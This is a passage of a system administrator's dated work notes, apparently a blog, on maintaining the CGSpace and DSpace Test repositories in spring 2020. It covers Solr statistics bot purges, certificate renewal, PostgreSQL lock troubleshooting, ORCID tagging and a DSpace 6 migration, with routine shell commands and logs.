$ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:/Delphi 2009/&rows=0"
+...
+<lst name="responseHeader"><int name="status">0</int><int name="QTime">52</int><lst name="params"><str name="q">userAgent:/Delphi 2009/</str><str name="rows">0</str></lst></lst><result name="response" numFound="38760" start="0"></result>
+$ for year in {2010..2019}; do curl -s "http://localhost:8081/solr/statistics-$year/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Delphi 2009"</query></delete>'; done
+$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Delphi 2009"</query></delete>'
+
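  • One way to avoid the quoting problem entirely (not what I ran, just a sketch) is to let curl URL-encode the query itself:

$ curl -s "http://localhost:8081/solr/statistics/select" --data-urlencode 'q=userAgent:"Delphi 2009"' -d 'rows=0'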
    +
  • Quoting them works for now until I can look into it and handle it properly in the script
  • +
  • This was about 400,000 hits in total purged from the Solr statistics
  • +
+

2020-04-30

+
    +
  • The TLS certificates on DSpace Test (linode26) have not been renewing correctly +
      +
    • The log shows the message “No renewals were attempted”
    • +
    • The certbot-auto certificates command doesn’t list the certificate I have installed
    • +
    • I guess this is because I copied it from the previous server…
    • +
    • I moved the Let’s Encrypt directory, got a new cert, then revoked the old one:
    • +
    +
  • +
+
# mv /etc/letsencrypt /etc/letsencrypt.bak
+# /opt/certbot-auto certonly --standalone --email fu@m.com -d dspacetest.cgiar.org --standalone --pre-hook "/bin/systemctl stop nginx" --post-hook "/bin/systemctl start nginx"
+# /opt/certbot-auto revoke --cert-path /etc/letsencrypt.bak/live/dspacetest.cgiar.org/cert.pem
+# rm -rf /etc/letsencrypt.bak
+
    +
  • Run all system updates on DSpace Test and reboot it
  • +
  • Tezira is still having issues submitting to CGSpace and the database is definitely busy according to Munin:
  • +
+

Tomcat postgres connections week

+
    +
  • But I don’t see a lot of connections in PostgreSQL itself:
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+      5 dspaceApi
+      6 dspaceCli
+     14 dspaceWeb
+$ psql -c 'select * from pg_stat_activity' | wc -l
+30
+
    +
  • Tezira said she cleared her browser cache and then was able to submit again +
      +
    • She said once she logged back in she had very many “Untitled” submissions pending
    • +
    • I see that the database connections are indeed much lower now:
    • +
    +
  • +
+

Tomcat postgres connections week

+
    +
  • The PostgreSQL log shows a lot of errors about deadlocks and queries waiting on other processes…
  • +
+
ERROR:  deadlock detected
+
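  • The log only shows that deadlocks happened; one way to see what is currently blocked is to ask PostgreSQL directly (a sketch; the wait_event columns assume PostgreSQL 9.6 or newer):

$ psql -c 'SELECT locktype, relation::regclass, pid, mode, granted FROM pg_locks WHERE NOT granted;'
$ psql -c 'SELECT pid, state, wait_event_type, wait_event, left(query, 60) FROM pg_stat_activity WHERE wait_event IS NOT NULL;'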

May, 2020

+ +
+

2020-05-02

+
    +
  • Peter said that CTA is having problems submitting an item to CGSpace +
      +
    • Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in ‘idle in transaction’ and ‘waiting for lock’ state increasing again
    • +
    • I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)
    • +
    +
  • +
+

2020-05-03

+
    +
  • Purge a few remaining bots from CGSpace Solr statistics that I had identified a few months ago +
      +
    • lua-resty-http/0.10 (Lua) ngx_lua/10000
    • +
    • omgili/0.5 +http://omgili.com
    • +
    • IZaBEE/IZaBEE-1.01 (Buzzing Abound The Web; https://izabee.com; info at izabee dot com)
    • +
    • Twurly v1.1 (https://twurly.org)
    • +
    • Pattern/2.6 +http://www.clips.ua.ac.be/pattern
    • +
    • CyotekWebCopy/1.7 CyotekHTTP/2.0
    • +
    +
  • +
  • This is only about 2,500 hits total from the last ten years, and half of these bots no longer seem to exist, so I won’t bother submitting them to the COUNTER-Robots project
  • +
  • I noticed that our custom themes were incorrectly linking to the OpenSearch XML file +
      +
    • The bug was fixed for Mirage2 in 2015
    • +
    • Note that this did not prevent OpenSearch itself from working
    • +
    • I will patch this on our DSpace 5.x and 6.x branches
    • +
    +
  • +
+

2020-05-06

+
    +
  • Atmire responded asking for more information about the Solr statistics processing bug in CUA so I sent them some full logs +
      +
    • Also I asked again about the Maven variable interpolation issue for cua.version.number, and if they would be willing to upgrade CUA to use Font Awesome 5 instead of 4.
    • +
    +
  • +
+

2020-05-07

+
    +
  • Linode sent an alert that there was high CPU usage on CGSpace (linode18) early this morning +
      +
    • I looked at the nginx logs using goaccess and I found a few IPs making lots of requests around then:
    • +
    +
  • +
+
# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "07/May/2020:(01|03|04)" | goaccess --log-format=COMBINED -
+
    +
  • The two main IPs making requests around then are 188.134.31.88 and 212.34.8.188 +
      +
    • The first is in Russia and it is hitting mostly XMLUI Discover links using dozens of different user agents, a total of 20,000 requests this week
    • +
    • The second IP is CodeObia testing AReS, a total of 171,000 hits this month
    • +
    • I will purge both of those IPs from the Solr stats using my check-spider-ip-hits.sh script:
    • +
    +
  • +
+
$ ./check-spider-ip-hits.sh -f /tmp/ips -s statistics -p
+Purging 171641 hits from 212.34.8.188 in statistics
+Purging 20691 hits from 188.134.31.88 in statistics
+
+Total number of bot hits purged: 192332
+
    +
  • And then I will add 188.134.31.88 to the nginx bad bot list and tell CodeObia to please use a “bot” user agent
  • +
  • I also changed the nginx config to block requests with blank user agents
  • +
+
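  • A quick way to verify that kind of rule from the outside is to make a request without a User-Agent header and check the response code (hypothetical test; the exact code returned depends on how the block is implemented, e.g. 403 or nginx’s 444):

$ curl -s -o /dev/null -w '%{http_code}\n' -A '' 'https://cgspace.cgiar.org/rest/status'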

2020-05-11

+
    +
  • Bizu said she was having issues submitting to CGSpace last week +
      +
    • The issue sounds like the one Tezira and CTA were having in the last few weeks
    • +
    • I looked at the PostgreSQL graphs and see there are a lot of connections in “idle in transaction” and “waiting for lock” state:
    • +
    +
  • +
+

PostgreSQL connections

+
    +
  • I think I’ll downgrade the PostgreSQL JDBC driver from 42.2.12 to 42.2.10, which was the version we were using before these issues started happening
  • +
  • Atmire sent some feedback about my ongoing issues with their CUA module, but none of it was conclusive yet +
      +
    • Regarding Font Awesome 5 they will check how much work it will take and give me a quote
    • +
    +
  • +
  • Abenet said some users are questioning why the statistics dropped so much lately, so I made a post to Yammer to explain about the robots
  • +
  • Last week Peter had asked me to add a new ILRI author’s ORCID iD +
      +
    • I added it to the controlled vocabulary and tagged the user’s existing ~11 items in CGSpace using this CSV file with my add-orcid-identifiers-csv.py script:
    • +
    +
  • +
+
$ cat 2020-05-11-add-orcids.csv
+dc.contributor.author,cg.creator.id
+"Lutakome, P.","Pius Lutakome: 0000-0002-0804-2649"
+"Lutakome, Pius","Pius Lutakome: 0000-0002-0804-2649"
+$ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
+
    +
  • Run system updates on CGSpace (linode18) and reboot it +
      +
    • I had to restart Tomcat five times before all Solr statistics cores came up OK, ugh.
    • +
    +
  • +
+

2020-05-12

+
    +
  • Peter noticed that CGSpace is no longer on AReS, because I blocked all requests that don’t specify a user agent +
      +
    • I’ve temporarily disabled that restriction and asked Moayad to look into how he can specify a user agent in the AReS harvester
    • +
    +
  • +
+

2020-05-13

+
    +
  • Atmire responded about Font Awesome and said they can switch to version 5 for 16 credits +
      +
    • I told them to go ahead
    • +
    +
  • +
  • Also, Atmire gave me a small workaround for the cua.version.number interpolation issue and said they would look into the crash that happens when processing our Solr stats
  • +
  • Run system updates and reboot AReS server (linode20) for the first time in almost 100 days +
      +
    • I notice that AReS now has some of CGSpace’s data in it (but not all) since I dropped the user-agent restriction on the REST API yesterday
    • +
    +
  • +
+

2020-05-17

+
    +
  • Create an issue in the OpenRXV project for Moayad to change the default harvester user agent (#36)
  • +
+

2020-05-18

+
    +
  • Atmire responded and said they still can’t figure out the CUA statistics issue, though they seem to only be trying to understand what’s going on using static analysis +
      +
    • I told them that they should try to run the code with the Solr statistics that I shared with them a few weeks ago
    • +
    +
  • +
+

2020-05-19

+
    +
  • Add ORCID identifier for Sirak Bahta +
      +
    • I added it to the controlled vocabulary and tagged the user’s existing ~40 items in CGSpace using this CSV file with my add-orcid-identifiers-csv.py script:
    • +
    +
  • +
+
$ cat 2020-05-19-add-orcids.csv
+dc.contributor.author,cg.creator.id
+"Bahta, Sirak T.","Sirak Bahta: 0000-0002-5728-2489"
+$ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
+
    +
  • An IITA user is having issues submitting to CGSpace and I see there is a rising number of PostgreSQL connections waiting in transaction and in lock:
  • +
+

PostgreSQL connections

+
    +
  • This is the same issue Tezira, Bizu, and CTA were having in the last few weeks, and I already downgraded the PostgreSQL JDBC driver to the last version I was using before this started (42.2.10) +
      +
    • I will downgrade it to version 42.2.9 for now…
    • +
    • The only other thing I can think of is that I upgraded Tomcat to 7.0.103 in March
    • +
    +
  • +
  • Run system updates on DSpace Test (linode26) and reboot it
  • +
  • Run system updates on CGSpace (linode18) and reboot it +
      +
    • After the system came back up I had to restart Tomcat 7 three times before all the Solr statistics cores came up OK
    • +
    +
  • +
  • Send Atmire a snapshot of the CGSpace database for them to possibly troubleshoot the CUA issue with DSpace 6
  • +
+

2020-05-20

+
    +
  • Send CodeObia some logos and footer text for the next phase of OpenRXV development (#18)
  • +
+

2020-05-25

+
    +
  • Add ORCID identifier for CIAT author Manuel Francisco +
      +
    • I added it to the controlled vocabulary and tagged the user’s existing ~27 items in CGSpace using this CSV file with my add-orcid-identifiers-csv.py script:
    • +
    +
  • +
+
$ cat 2020-05-25-add-orcids.csv
+dc.contributor.author,cg.creator.id
+"Díaz, Manuel F.","Manuel Francisco Diaz Baca: 0000-0001-8996-5092"
+"Díaz, Manuel Francisco","Manuel Francisco Diaz Baca: 0000-0001-8996-5092"
+$ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
+
    +
  • Last week Maria asked again about searching for items by accession or issue date +
      +
    • A few months ago I had told her to search for the ISO8601 date in Discovery search, which appears to work because it filters the results down quite a bit
    • +
    • She pointed out that the results include hits that don’t exactly match, for example if part of the search string appears elsewhere like in the timestamp
    • +
    • I checked in Solr and the results are the same, so perhaps it’s a limitation in Solr…?
    • +
    • So this effectively means that we don’t have a way to create reports for items in an arbitrary date range shorter than a year: +
        +
      • DSpace advanced search is buggy or simply not designed to work like that
      • +
      • AReS Explorer currently only allows filtering by year, but will allow months soon
      • +
      • Atmire Listings and Reports only allows a “Timespan” of a year
      • +
      +
    • +
    +
  • +
+

2020-05-29

+
    +
  • Linode alerted to say that the CPU load on CGSpace (linode18) was high for a few hours this morning +
      +
    • Looking at the nginx logs for this morning with goaccess:
    • +
    +
  • +
+
# cat /var/log/nginx/*.log.1 | grep -E "29/May/2020:(02|03|04|05)" | goaccess --log-format=COMBINED -
+
    +
  • The top is 172.104.229.92, which is the AReS harvester (still not using a user agent, but it’s tagged as a bot in the nginx mapping)
  • +
  • Second is 188.134.31.88, which is a Russian host that we also saw in the last few weeks, using a browser user agent and hitting the XMLUI (but it is tagged as a bot in nginx as well)
  • +
  • Another one is 51.158.106.4, which is some Scaleway IP making requests to XMLUI with different browser user agents that I am pretty sure I have seen before but never blocked +
      +
    • According to Solr it has made about 800 requests this year, but still… it’s a bot.
    • +
    +
  • +
  • One I don’t think I’ve seen before is 95.217.58.146, which is making requests to XMLUI with a Drupal user agent + +
  • +
  • Atmire got back to me about the Solr CUA issue in the DSpace 6 upgrade and they cannot reproduce the error +
      +
    • The next step is for me to migrate DSpace Test (linode26) to DSpace 6 and try to reproduce the error there
    • +
    +
  • +
+

2020-05-31

+
    +
  • Start preparing to migrate DSpace Test (linode26) to the 6_x-dev-atmire-modules branch +
      +
    • Run all system updates and reboot
    • +
    • For now I will disable all yearly Solr statistics cores except the current statistics one
    • +
    • Prepare PostgreSQL with a clean snapshot of CGSpace’s DSpace 5.8 database:
    • +
    +
  • +
+
$ sudo su - postgres
+$ dropdb dspacetest
+$ createdb -O dspacetest --encoding=UNICODE dspacetest
+$ psql dspacetest -c 'alter user dspacetest superuser;'
+$ pg_restore -d dspacetest -O --role=dspacetest /tmp/cgspace_2020-05-31.backup
+$ psql dspacetest -c 'alter user dspacetest nosuperuser;'
+# run DSpace 5 version of update-sequences.sql!!!
+$ psql -f /home/dspace/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+$ psql dspacetest -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');"
+$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;'
+$ exit
+
    +
  • Now switch to the DSpace 6.x branch and start a build:
  • +
+
$ chrt -i 0 ionice -c2 -n7 nice -n19 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false package
+...
+[ERROR] Failed to execute goal on project additions: Could not resolve dependencies for project org.dspace.modules:additions:jar:6.3: Failed to collect dependencies at com.atmire:atmire-listings-and-reports-api:jar:6.x-2.10.8-0-SNAPSHOT: Failed to read artifact descriptor for com.atmire:atmire-listings-and-reports-api:jar:6.x-2.10.8-0-SNAPSHOT: Could not transfer artifact com.atmire:atmire-listings-and-reports-api:pom:6.x-2.10.8-0-SNAPSHOT from/to atmire.com-snapshots (https://atmire.com/artifactory/atmire.com-snapshots): Not authorized , ReasonPhrase:Unauthorized. -> [Help 1]
+
    +
  • Great! I will have to send Atmire a note about this… but for now I can sync over my local ~/.m2 directory and the build completes
  • +
  • After the Maven build completed successfully I installed the updated code with Ant (make sure to delete the old spring directory):
  • +
+
$ cd dspace/target/dspace-installer
+$ rm -rf /blah/dspacetest/config/spring
+$ ant update
+
    +
  • Database migrations take 10:18.287s during the first startup… +
      +
    • perhaps when we do the production CGSpace migration I can do this in advance and tell users not to make any submissions?
    • +
    +
  • +
  • I had a mistake in my Solr internal URL parameter so DSpace couldn’t find it, but once I fixed that DSpace starts up OK!
  • +
  • Once the initial Discovery reindexing was completed (after three hours or so!) I started the Solr statistics UUID migration:
  • +
+
$ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
+$ dspace solr-upgrade-statistics-6x -i statistics -n 250000
+$ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
+$ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
+...
+
    +
  • It’s taking about 35 minutes for 1,000,000 records…
  • +
  • Some issues towards the end of this core:
  • +
+
Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:68)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:54)
+        at org.dspace.util.SolrUpgradePre6xStatistics.batchUpdateStats(SolrUpgradePre6xStatistics.java:161)
+        at org.dspace.util.SolrUpgradePre6xStatistics.run(SolrUpgradePre6xStatistics.java:456)
+        at org.dspace.util.SolrUpgradePre6xStatistics.main(SolrUpgradePre6xStatistics.java:365)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • So basically there are some documents that have IDs that have not been converted to UUID, and have not been labeled as “unmigrated” either… +
      +
    • Of these 101,257 documents, 90,000 are of type 5 (search), 9,000 are type storage, and 800 are type view, but it’s weird because if I look at their type/statistics_type using a facet the storage ones disappear…
    • +
    • For now I will export these documents from the statistics core and then delete them:
    • +
    +
  • +
+
$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o statistics-unmigrated.json -k uid -f '(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)'
+$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
+
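  • For reference, the type breakdown above came from faceting on the same query used for the export; roughly like this (hypothetical invocation; curl’s --data-urlencode handles the spaces in the query):

$ curl -s "http://localhost:8081/solr/statistics/select" --data-urlencode 'q=(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)' -d 'rows=0&facet=true&facet.field=type&wt=json&indent=true'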
    +
  • Now the UUID conversion script says there is nothing left to convert, so I can try to run the Atmire CUA conversion utility:
  • +
+
$ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
+$ dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 1
+
    +
  • The processing is very slow and there are lots of errors like this:
  • +
+
Record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221 couldn't be processed
+com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:304)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(AtomicStatisticsUpdater.java:176)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(AtomicStatisticsUpdater.java:161)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(AtomicStatisticsUpdater.java:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(AtomicStatisticsUpdateCLI.java:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: java.lang.NullPointerException
+
    +
  • Experiment a bit with the Python country-converter library as it can convert between different formats (like ISO 3166 and UN m49) +
      +
    • We need to eventually find a format we can use for all CGIAR DSpaces…
    • +
    +
  • +

June, 2020

+ +
+

2020-06-01

+
    +
  • I tried to run the AtomicStatisticsUpdateCLI CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday +
      +
    • I sent Atmire the dspace.log from today and told them to log into the server to debug the process
    • +
    +
  • +
  • In other news, I checked the statistics API on DSpace 6 and it’s working
  • +
  • I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:
  • +
+
$ dspace oai import -c
+OAI 2.0 manager action started
+Loading @mire database changes for module MQM
+Changes have been processed
+Clearing index
+Index cleared
+Using full import.
+Full import
+java.lang.NullPointerException
+        at org.dspace.xoai.app.XOAI.willChangeStatus(XOAI.java:438)
+        at org.dspace.xoai.app.XOAI.index(XOAI.java:368)
+        at org.dspace.xoai.app.XOAI.index(XOAI.java:280)
+        at org.dspace.xoai.app.XOAI.indexAll(XOAI.java:227)
+        at org.dspace.xoai.app.XOAI.index(XOAI.java:134)
+        at org.dspace.xoai.app.XOAI.main(XOAI.java:560)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+

2020-06-02

+
    +
  • I noticed that I was able to do a partial OAI import (ie, without -c) +
      +
    • Then I tried to clear the OAI Solr core and import, but I get the same error:
    • +
    +
  • +
+
$ curl http://localhost:8080/solr/oai/update -H "Content-type: text/xml" --data-binary '<delete><query>*:*</query></delete>'
+$ curl http://localhost:8080/solr/oai/update -H "Content-type: text/xml" --data-binary '<commit />'
+$ ~/dspace63/bin/dspace oai import
+OAI 2.0 manager action started
+...
+There are no indexed documents, using full import.
+Full import
+java.lang.NullPointerException
+        at org.dspace.xoai.app.XOAI.willChangeStatus(XOAI.java:438)
+        at org.dspace.xoai.app.XOAI.index(XOAI.java:368)
+        at org.dspace.xoai.app.XOAI.index(XOAI.java:280)
+        at org.dspace.xoai.app.XOAI.indexAll(XOAI.java:227)
+        at org.dspace.xoai.app.XOAI.index(XOAI.java:143)
+        at org.dspace.xoai.app.XOAI.main(XOAI.java:560)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • I found a bug report on DSpace Jira describing this issue affecting someone else running DSpace 6.3 +
      +
    • They suspect it has to do with the item having some missing group names in its authorization policies
    • +
    • I added some debugging to dspace-oai/src/main/java/org/dspace/xoai/app/XOAI.java to print the Handle of the item that causes the crash and then I looked at its authorization policies
    • +
    • Indeed there are some blank group names:
    • +
    +
  • +
+

Missing group names in DSpace 6.3 item authorization policy

+
    +
  • The same item on CGSpace (DSpace 5.8) also has groups with no name:
  • +
+

Missing group names in DSpace 5.8 item authorization policy

+
    +
  • I added some debugging and found exactly where this happens +
      +
    • As it turns out we can just check if the group policy is null there and it allows the OAI import to proceed
    • +
    • Aaaaand as it turns out, this was fixed in dspace-6_x in 2018 after DSpace 6.3 was released (see DS-4019), so that was a waste of three hours.
    • +
    • I cherry picked 150e83558103ed7f50e8f323b6407b9cbdf33717 into our current 6_x-dev-atmire-modules branch
    • +
    +
  • +
+

2020-06-04

+
    +
  • Maria was asking about some items they are trying to map from the CGIAR Big Data collection into their Alliance of Bioversity and CIAT journal articles collection, but for some reason the items don’t show up in the item mapper +
      +
    • The items don’t even show up in the XMLUI Discover advanced search, and actually I don’t even see any recent items on the recently submitted part of the collection (but the item pages exist of course)
    • +
    • Perhaps I need to try a full Discovery re-index:
    • +
    +
  • +
+
$ time chrt -i 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    125m37.423s
+user    11m20.312s
+sys     3m19.965s
+
    +
  • Still I don’t see the item in XMLUI search or in the item mapper (and I made sure to clear the Cocoon cache) +
      +
    • I’m starting to think it’s something related to the database transaction issue…
    • +
    • I removed our custom JDBC driver from /usr/local/apache-tomcat... so that DSpace will use its own much older one, version 9.1-901-1.jdbc4
    • +
    • I ran all system updates on the server (linode18) and rebooted it
    • +
    • After it came back up I had to restart Tomcat five times before all Solr statistics cores came up properly
    • +
    • Unfortunately this means that the Tomcat JDBC pooling via JNDI doesn’t work, so we’re using only the 30 connections reserved for the DSpace CLI from DSpace’s own internal pool
    • +
    • Perhaps our previous issues with the database pool from a few years ago will be less now that we have much more aggressive blocking and rate limiting of bots in nginx
    • +
    +
  • +
  • I will also import a fresh database snapshot from CGSpace and check if I can map the item in my local environment +
      +
    • After importing and forcing a full reindex locally I can see the item in search and in the item mapper
    • +
    +
  • +
  • Abenet sent another message about two users who are having issues with submission, and I see the number of locks in PostgreSQL has sky rocketed again as of a few days ago:
  • +
+

PostgreSQL locks week

+
    +
  • As far as I can tell this started happening for the first time in April, connections and locks:
  • +
+

PostgreSQL connections year +PostgreSQL locks year

+
    +
  • I think I need to just leave this as is with the DSpace default JDBC driver for now, but perhaps I could also downgrade the Tomcat version (I deployed Tomcat 7.0.103 in March, so perhaps that’s relevant)
  • +
  • Also, I’ll start another full reindexing to see if the issue with mapping is somehow also resolved now that the database connections are working better +
      +
    • Perhaps related, but this one finished much faster:
    • +
    +
  • +
+
$ time chrt -i 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    101m41.195s
+user    10m9.569s
+sys     3m13.929s
+
    +
  • Unfortunately the item is still not showing up in the item mapper…
  • +
  • Something happened to AReS Explorer (linode20) so I ran all system updates and rebooted it
  • +
+

2020-06-07

+
    +
  • Peter said he was annoyed with a CSV export from CGSpace because of the different text_lang attributes and asked if we can fix it
  • +
  • The last time I normalized these was in 2019-06, and currently it looks like this:
  • +
+
dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE resource_type_id=2 GROUP BY text_lang ORDER BY count DESC;
+  text_lang  |  count
+-------------+---------
+ en_US       | 2158377
+ en          |  149540
+             |   49206
+ es_ES       |      18
+ fr          |       4
+ Peer Review |       1
+             |       0
+(7 rows)
+
    +
  • In theory we can have different languages for metadata fields but in practice we don’t do that, so we might as well normalize everything to “en_US” (and perhaps I should make a curation task to do this)
  • +
  • For now I will do it manually on CGSpace and DSpace Test:
  • +
+
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2;
+UPDATE 2414738
+
+
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
+
    +
  • Peter asked if it was possible to find all ILRI items that have “zoonoses” or “zoonotic” in their titles and check if they have the ILRI subject “ZOONOTIC DISEASES” (and add it if not) +
      +
    • Unfortunately the only way we have currently would be to export the entire ILRI community as a CSV and filter/edit it in OpenRefine
    • +
    +
  • +
+

2020-06-08

+
    +
  • I manually mapped the two Big Data items that Maria had asked about last week by exporting their metadata to CSV and re-importing it +
      +
    • I still need to look into the underlying issue there, seems to be something in Solr
    • +
    • Something strange is that, when I search for part of the title in Discovery I get 2,000 results on CGSpace, while on my local DSpace 5.8 environment I only get 2!
    • +
    +
  • +
+

CGSpace Discovery search results

+

CGSpace Discovery search results

+
    +
  • On DSpace Test, which is currently running DSpace 6, I get 2,000 results but the top one is the correct match and the item does show up in the item mapper +
      +
    • Interestingly, if I search directly in the Solr search core on CGSpace with a query like handle:10568/108315 I don’t see the item, but on my local Solr I do!
    • +
    +
  • +
  • Peter asked if it was easy for me to add ILRI subject “ZOONOTIC DISEASES” to any items in the ILRI community that had “zoonotic” or “zoonoses” in their title, but were missing the ILRI subject +
      +
    • I exported the ILRI community metadata, cut the three fields I needed, and then filtered and edited the CSV in OpenRefine:
    • +
    +
  • +
+
$ dspace metadata-export -i 10568/1 -f /tmp/2020-06-08-ILRI.csv
+$ csvcut -c 'id,cg.subject.ilri[en_US],dc.title[en_US]' ~/Downloads/2020-06-08-ILRI.csv > /tmp/ilri.csv
+
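  • As an alternative to OpenRefine for the filtering step above, a rough csvkit sketch (column names come from the export above; the output file name and exact regex are my own assumptions):
# items whose title mentions zoonotic/zoonoses but that lack the ILRI subject
$ csvgrep -c 'dc.title[en_US]' -r '(?i)zoono(tic|ses)' /tmp/ilri.csv \
  | csvgrep -c 'cg.subject.ilri[en_US]' -r 'ZOONOTIC DISEASES' -i \
  > /tmp/ilri-missing-zoonotic.csv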
    +
  • Moayad asked why he’s getting HTTP 500 errors on CGSpace +
      +
    • I looked in the Nginx logs and I see some HTTP 500 responses, but nothing in nginx’s error.log
    • +
    • Looking in Tomcat’s log I see there are many:
    • +
    +
  • +
+
# journalctl --since=today -u tomcat7  | grep -c 'Internal Server Error'
+482
+
    +
  • They are all related to the REST API, like:
  • +
+
Jun 07 02:00:27 linode18 tomcat7[6286]: SEVERE: Mapped exception to response: 500 (Internal Server Error)
+Jun 07 02:00:27 linode18 tomcat7[6286]: javax.ws.rs.WebApplicationException
+Jun 07 02:00:27 linode18 tomcat7[6286]:         at org.dspace.rest.Resource.processException(Resource.java:151)
+Jun 07 02:00:27 linode18 tomcat7[6286]:         at org.dspace.rest.ItemsResource.getItems(ItemsResource.java:195)
+Jun 07 02:00:27 linode18 tomcat7[6286]:         at sun.reflect.GeneratedMethodAccessor548.invoke(Unknown Source)
+Jun 07 02:00:27 linode18 tomcat7[6286]:         at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+Jun 07 02:00:27 linode18 tomcat7[6286]:         at java.lang.reflect.Method.invoke(Method.java:498)
+Jun 07 02:00:27 linode18 tomcat7[6286]:         at com.sun.jersey.spi.container.JavaMethodInvokerFactory$1.invoke(JavaMethodInvokerFactory.java:60)
+...
+
    +
  • And:
  • +
+
Jun 08 09:28:29 linode18 tomcat7[6286]: SEVERE: Mapped exception to response: 500 (Internal Server Error)
+Jun 08 09:28:29 linode18 tomcat7[6286]: javax.ws.rs.WebApplicationException
+Jun 08 09:28:29 linode18 tomcat7[6286]:         at org.dspace.rest.Resource.processFinally(Resource.java:169)
